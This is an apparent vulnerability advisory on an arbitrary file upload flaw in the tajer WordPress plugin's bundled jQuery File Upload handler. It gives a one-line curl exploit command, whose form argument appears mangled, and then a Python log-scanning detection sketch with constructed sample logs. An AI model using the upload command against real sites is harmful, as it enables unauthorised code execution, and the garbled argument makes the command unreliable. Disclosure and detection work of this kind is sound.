Title: Arbitrary file upload vulnerability in WordPress Plugin tajer v1.05
Author: Larry W. Cashdollar, @_larry0
Download Site: https://wordpress.org/plugins/tajer
Vendor Notified: no
Description: Tajer – All In One eCommerce WordPress Premium Class Plugin.
You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products.
This plugin bundles components of Blueimp's jQuery File Upload, which is vulnerable to arbitrary file upload and code execution.
curl -F "firstname.lastname@example.org" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php
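
Detection sketch for the endpoint above, added here as an example and not part of the original advisory: it scans web server access logs for POSTs to a plugin-bundled Blueimp handler and for requests to script files under its upload directory. Assumptions: logs are in common/combined format, uploads land in the handler's default `files/` subdirectory, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Any plugin that bundles the Blueimp server-side handler, not only tajer.
HANDLER = re.compile(
    r"^/wp-content/plugins/[^/]+/.*server/php/(index\.php)?$", re.I)
# Assumption: uploads are stored in the handler's default "files/" subdirectory.
UPLOADED_SCRIPT = re.compile(
    r"^/wp-content/plugins/[^/]+/.*server/php/files/.+\.(php\d?|phtml|phar)$", re.I)
# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})')

def scan(lines):
    """Return (line_no, client_ip, finding, path, status) for suspicious requests."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        # Drop the query string and decode %xx so encoded paths still match.
        path = unquote(urlsplit(m["target"]).path)
        status = int(m["status"])
        if m["method"] == "POST" and HANDLER.match(path):
            findings.append((n, m["ip"], "upload-handler-post", path, status))
        elif UPLOADED_SCRIPT.match(path):
            findings.append((n, m["ip"], "script-in-upload-dir", path, status))
    return findings

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Jan/2024:10:00:01 +0000] '
    '"GET /wp-content/plugins/tajer/readme.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Jan/2024:10:00:05 +0000] "POST /wp-content/plugins/tajer'
    '/lib/jQuery-File-Upload-master/server/php/index.php HTTP/1.1" 200 301',
    '203.0.113.9 - - [10/Jan/2024:10:00:09 +0000] "GET /wp-content/plugins/tajer'
    '/lib/jQuery-File-Upload-master/server/php/files/example.php?x=1 HTTP/1.1" 200 17',
    '198.51.100.4 - - [10/Jan/2024:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response on either finding warrants checking the plugin directory for unexpected files; removing or blocking the bundled `server/php/` directory closes the endpoint.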